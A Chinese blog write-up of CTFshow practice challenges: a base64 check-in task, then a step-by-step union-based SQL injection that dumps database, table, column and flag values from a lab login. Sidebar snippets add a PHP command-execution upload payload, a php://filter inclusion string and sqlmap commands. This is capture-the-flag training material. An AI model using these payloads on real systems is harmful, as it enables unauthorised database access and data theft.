CTFshow 每日一练

最新推荐文章于 2024-05-17 10:42:25 发布
最新推荐文章于 2024-05-17 10:42:25 发布
阅读量525 收藏 1
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73867210/article/details/128518509
版权

一、web签到题

打开链接

71d8ee33ed544b71b724c209956f1dac.jpg

 查看源码

f99c50359f624b9caddd727c69602224.jpg

 利用base64解码得到flag

cabf810c683e4e44a34ee950c9c0e8e3.jpg

 二、web2

看到有提示--SQL注入

2dd69ca7a9c54aa89f4fe7431cd25a12.jpg

 先试着使用万能密码登陆

ebf9f892c06846a6896007f42304eece.jpg

71848295691c42e6a6a8f1759365cf6a.jpg 

 发现有回显,直接sql注入

' or 1=1 order by 3#

发现到4时不回显

728aeff0a2e04fdf85c69321415f1c56.jpg

 开始爆库名,看看哪个位置会回显

' or 1=1 union select 1,2,3#

1766386682354af0b7f52d57297c037c.jpg

 ' or 1=1 union select 1,database(),3#

770acb82099b47b497354700c4081acd.jpg

 得到库名:web2,爆表名

' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema='web2' limit 0,1),3 #

77cee96394544b909c1523b1457da5d0.jpg

 爆字段' or 1=1 union select 1,(select column_name from information_schema.columns where table_name='flag' limit 0,1),3#

5bff7d3f8e2c4d0898fe2792efb9a137.jpg

 查询数据

' or 1=1 union select 1,(select flag from flag limit 0,1),3#

得到flag

de5d3c7470d34418a6b03ca807216c55.jpg

 参考有以下文章

http://c.biancheng.net/view/8283.html

https://www.cnblogs.com/peace-and-romance/p/15890387.html

https://blog.csdn.net/qq_44159028/article/details/114325805​​​​​​​​​​​​​​​​​​​​

orange-snow
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFshow-菜狗杯-web签到
qq_31415417的博客
12-06 3231
CTFshow参数传递的获取、url编码、eval命令执行 解题思路 先是cookie传参再是POST传参再是GET传参再是REQUEST传参最后是eval命令执行分析链接https://note.youdao.com/ynoteshare/index.html?id=def831ca8bef3926b1cb0e62249d6e88&type=note&_time=1670206729016构造payload 得到flag
Web10道签到
网安菜鸡学习笔记
02-03 162
题目1 万能密码 题目2 弱口令 admin 123456登录后台,文件管理上传<?php system('cat /tmp/flag');?> 题目3 题目4 F12发现include.phpinclude.php?file=php://filter/read=convert.base64-encode/resource=include.php 查看文件源码,发现upload....
CTF show----web 解题笔记(web签到~web6)
最新发布
weixin_42340783的博客
05-17 548
从输出结果可以看到,str1和str2在php中的MD5用==判断是相等的,而实际上生成的是两段不一样的MD5值,两段MD5值都是0e开头的,在科学计数法中0e开头不管后边数是多少,他的数值都为0。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
菜狗杯Web签到wp
Altering_Ji的博客
11-17 3196
菜狗杯web签到题wp
2024腾龙杯web签到题-初识jwt(签到:这是一个登录页面)
Welcome To Myon'Blog !
03-18 741
它是 JSON Web Token 的缩写,是一个开放标准,定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息,该信息可以被验证和信任,因为它是数字签名的。它就是一种认证机制,让后台知道该请求是来自于受信的客户端。jwt 由三部分组成,它们之间用圆点(.)连接,这三部分分别是:Header、Payload、Signature。回到最初请求的 login , post 传入 json 格式的 tooken。回显得到一个 token ,也是 json 的格式。
{青少年CTF} Web签到 详解
lfc18950509270的博客
07-26 1152
又是除了几个字外一片空白,可能有的同学照例打开源代码看了起来,但是什么也没发现。这时候,我们可能就需要看一下它的目录下有没有什么文件里藏着flag。可以发现,扫描出目录下存在一个加index.php.bak的文件,直接复制到浏览器中,下载得到它,直接打开即可发现flag。至于它的安装和使用方法你们可以自己搜一下,或者你们需要在找个时间单独写一篇。这边使用的命令是dirsearch -u ,u指的就是url的意思。这样我们又有了一种思路可以拿到flag了,虽然也比较简单。进入之后可以看到是长这样的。
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
CTFshow-web -入门签到
pone2233的博客
12-15 1461
CTFshow Web web签到题 F12 web2 先抓包然后按照流程跑 把之前抓取的数据复制到sqlmap根目录下test.txt内 保存完成后开始跑数据库名 python2 sqlmap.py -r test.txt --dbs 跑数据库内数据表 python2 sqlmap.py -r test.txt -D web2 --tables 查看字段 python2 sqlmap.py -r test.txt -D web2 -T flag --columns [ 查询字段内容 p
内部赛 签到-ctf.show
yuqie的博客
06-14 374
这结果可是跑了好几个网站才出来,观察一下上面的图案,是十二星座,网上科普一下。的字符编码(xx等于该字符在字符集表里面的编码的16进制数字)。天秤座 ♎ U+264E(9月23日 - 10月23日)金牛座 ♉ U+2649(4月21日 - 5月21日)双子座 ♊ U+264A(5月22日 - 6月21日)巨蟹座 ♋ U+264B(6月22日 - 7月22日)狮子座 ♌ U+264C(7月23日 - 8月22日)处女座 ♍ U+264D(8月23日 - 9月22日)
CTFSHOW 签到
MrTreebook的博客
12-05 1064
CTFSHOW 萌新赛 签到题1.题目下载地址2. checksec检查保护3.IDA分析4.构造ROP链4.exp 1.题目下载地址 点击下载题目 2. checksec检查保护 堆不可执行 3.IDA分析 看到了gets()函数,很明显存在溢出 需要知道64位系统和32位系统的区别 64 位系统传参从第一个到第六个依次保存在rdi,rsi,rdx,rcx,r8,r9 从第7个参数开始,接下来的所有参数都才通过栈传递 4.构造ROP链 我们需要找到合适的 gadgets,利用 ROPgadget a
CTFshow刷题日记-WEB-黑盒测试(web380-395)文件包含、日志包含getshell、SQL注入
Love&Share
10-07 3055
web380-扫目录文件包含 扫目录,存在page.php 访问发现报错,$id参数,可能存在文件包含 /page.php?id=flag web381-读源码找后台地址 page.php已经无法文件包含 看源码有一个可疑的路径 访问这个目录,最后注意一定要带上/ web382-383弱口令加万能密码 上题的/alsckdfy/目录访问之后是个登录界面 burp抓包爆破就行了,p字段,这些都可以拿到flag web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这肯定是后台密码了,
[Web安全学习] SSTL模板注入总结
Y1seco的博客
08-18 1376
前置知识 引自 bfengj __class__ 类的一个内置属性,表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__ __mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。 __subclasses__() 返回这个类的子类集合,Each class keeps a list of w
ctfshow 刷题记录
m0_73867210的博客
02-15 133
一、web39 看到有过滤,有include想着怕不是又是文件包含 因为这个我不太会搜了下其他博主的文章,果然如此,那就照着别的人写呗,顺便看一下新知识 网上是用的tac,但是我想着cat不是应该也行吗就用了下,没想到也出来,那为啥用tac呢?我又搜了下这两啥区别 还有个.php弄了半天这个,网上说是啥后缀,我也不知道,然后直到看到这个 我真是服了呀 二、web40 看不懂,又搜了下 其他博主说要用套娃,嗯,搜
CTFshow刷题日记-WEB-爆破
Love&Share
09-03 3296
web21 提示:爆破什么的,都是基操 有一个zip文件,解压是一个爆破字典 Authorization: Basic dG9tY2F0OmFkbWlu ------->输入的用户名/口令以base64的形式传输。认证失败显示401 认证成功为200 将Authorization字段后面的值进行base64 解码,即可获取用户认证信息明文 使用bp的Intruder模块 payload type 选择custom iterator(自定义迭代器) 自定义迭代器可以自定义拼接方式,positio
web方面刷题日记
m0_73867210的博客
01-30 102
一、buuctf web Havefun 打开靶机,看到如下 查看源码 分析源码传入需要值得到flag 二、buuctf web include 打开链接 点击tips 按F12也没有东西,在网上搜了一下其他大佬的做法,果真是还没有接触的东西 接着就和大佬的做法一样得到了flag 三、web29 以下文字皆网上搜索到的知识点: GET方式获取参数c,并将eval($c)将c作为代码执行,preg_match
ctfshow是一个什么样的网站
05-11
CTFShow是一个在线CTF(Capture the Flag)比赛平台,旨在提供一个安全、合法、有趣和有挑战的环境,让安全爱好者和专业人士能够在其中进行竞争和学习,提高他们的技能。CTFShow平台提供了多种类型的CTF比赛,包括...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值